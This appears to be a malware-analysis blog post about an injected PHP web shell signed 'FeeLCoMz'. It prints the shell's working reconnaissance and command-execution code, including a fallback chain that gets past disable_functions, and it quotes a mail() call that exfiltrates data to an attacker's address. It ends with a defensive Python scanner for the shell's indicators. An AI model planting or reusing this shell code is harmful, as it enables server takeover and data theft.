
Wednesday, 26 October 2011

Dissecting Sample No - 3

Well, this example is a bit more sophisticated. It carries every function an attacker needs to be able to do
just about anything on your server...

When injected into a host, the function fx() is executed 11 times by default, printing the attacker's signature and the following:

1- Whether safe mode is ON or OFF,
2- Operating system and description info,
3- The username your PHP is running as,
4- The user id your PHP is running as,
5- The IP address of your server,
6- Current working directory,
7- The permissions of the current working directory, i.e. whether it is writable or not,
8- The hard disk capacity: total, free and used space,
9- And a list of disabled PHP functions.

##[ Fx29ID ]##
# Reconnaissance block: each fx() call prints one "LABEL: value" line.
# This is what the attacker sees first, starting with the FeeLCoMz signature.
fx("ID","FeeL"."CoMz");
$P = @getcwd();
$IP = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
# Helper functions used by the block above.
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "\n"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
# getdisfunc() reads disable_functions from php.ini; enabled() uses it to pick a usable exec function.
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
# fx29exec() runs $cmd through the first command-execution function that is not disabled;
# disabling only one of them is not enough, the next one in the chain is tried.
function fx29exec($cmd) {
if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096); } pclose($h); }
else { $rez = "Error!"; }
return $rez;
}
# vsize() formats a byte count as B/KB/MB/GB for the HDD line.
function vsize($size) {
if (!is_numeric($size)) { return FALSE; }
else {
if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
else { $size = $size . " B"; }
return $size;
}
}
function hdd($type) {
# Note: the sample reads $U before assigning it, so its "used" figure is not total minus free.
$P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
$hddspace = array("total" => vsize($T), "free" => vsize($F), "used" => vsize($U));
return $hddspace[$type];
}
die("FeeLCoMz");

Having collected the detailed system information described above, the attacker now has one more game to play.
The function fx29exec() is designed for this mission. It simply receives a command from the attacker and executes
it through whichever of the following shell execution functions is available: exec(), shell_exec(), system(),
passthru() or popen(). If any one of these functions is not disabled and PHP has suitable privileges, the attacker
may delete, change, modify or download anything. The other functions of the sample not discussed here are the
private helpers for performing the tasks described above.

In some of the injected code files, this kid used mail("feelcomz@gmail.com",$judul,$body); that is, he used the e-mail address "feelcomz@gmail.com" for stealing your files/data. If you have suffered serious damage, you may ask Gmail for help in finding the IP addresses that accessed this e-mail address.
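To turn the analysis above into something a defender can run, here is an added Python example (it is not code from the original post or from the sample). It covers two points made on this page: the exec()/shell_exec()/system()/passthru()/popen() fallback chain in fx29exec(), which a php.ini disable_functions value must block completely to be effective, and the literal indicators this post identifies (the fx29exec name, the FeeLCoMz signature, and the mail() call to feelcomz@gmail.com), which can be scanned for in PHP files. The php.ini values and PHP snippets are constructed; including proc_open in the checked list is an assumption beyond the sample, since it does not appear in the code above.

```python
import re

# Functions the sample's fx29exec() tries in order (from the code above),
# plus proc_open, which is not in the sample but is assumed worth blocking
# alongside them because it offers the same capability.
EXEC_CHAIN = ["exec", "shell_exec", "system", "passthru", "popen"]
EXTRA_EXEC = ["proc_open"]

# Literal indicators taken from the sample on this page.
INDICATORS = {
    "fx29exec_name": re.compile(r"\bfx29exec\s*\("),
    # matches both "FeeLCoMz" and the split form "FeeL"."CoMz"
    "feelcomz_marker": re.compile(r"FeeL\W*CoMz"),
    "exfil_mail": re.compile(r"mail\s*\(\s*[\"']feelcomz@gmail\.com[\"']"),
}
QUOTED_EXEC = re.compile(r"[\"'](exec|shell_exec|system|passthru|popen)[\"']")


def parse_disable_functions(value: str) -> set:
    """Split a php.ini disable_functions value into a set of lower-case names."""
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def remaining_exec_functions(disable_functions: str) -> list:
    """Return the command-execution functions the shell could still reach under
    the given disable_functions value, in the order fx29exec() would try them."""
    disabled = parse_disable_functions(disable_functions)
    return [f for f in EXEC_CHAIN + EXTRA_EXEC if f not in disabled]


def scan_php_source(src: str) -> list:
    """Return the names of the indicators found in one PHP file's contents."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    # The fallback chain shows up as several exec-family names in string form
    # (the arguments to enabled()); three or more distinct ones is the sample's shape.
    if len(set(QUOTED_EXEC.findall(src))) >= 3:
        hits.append("exec_fallback_chain")
    return hits


# Constructed inputs (not files from the original post).
WEAK_INI = "exec,shell_exec"  # blocks only the first two of the chain
STRONG_INI = "exec, shell_exec, system, passthru, popen, proc_open"

SUSPECT = '''<?php
$UID = fx29exec("id");
if (enabled("exec")) {} elseif (enabled("shell_exec")) {} elseif (enabled("system")) {}
mail("feelcomz@gmail.com",$judul,$body);
die("FeeLCoMz");
'''
BENIGN = '''<?php
$files = scandir(getcwd());
mail("admin@example.com", "Report", implode("\\n", $files));
'''

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("strong", STRONG_INI)):
        print(f"{label} disable_functions still leaves:", remaining_exec_functions(ini) or "nothing")
    for label, src in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(f"{label}: {scan_php_source(src)}")
```

The disable_functions check is the part worth keeping: because the shell walks down the chain, a setting that names only one or two of these functions gives no protection at all. The indicator scan is deliberately narrow (this sample's own strings), so a missing hit does not mean a file is clean.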
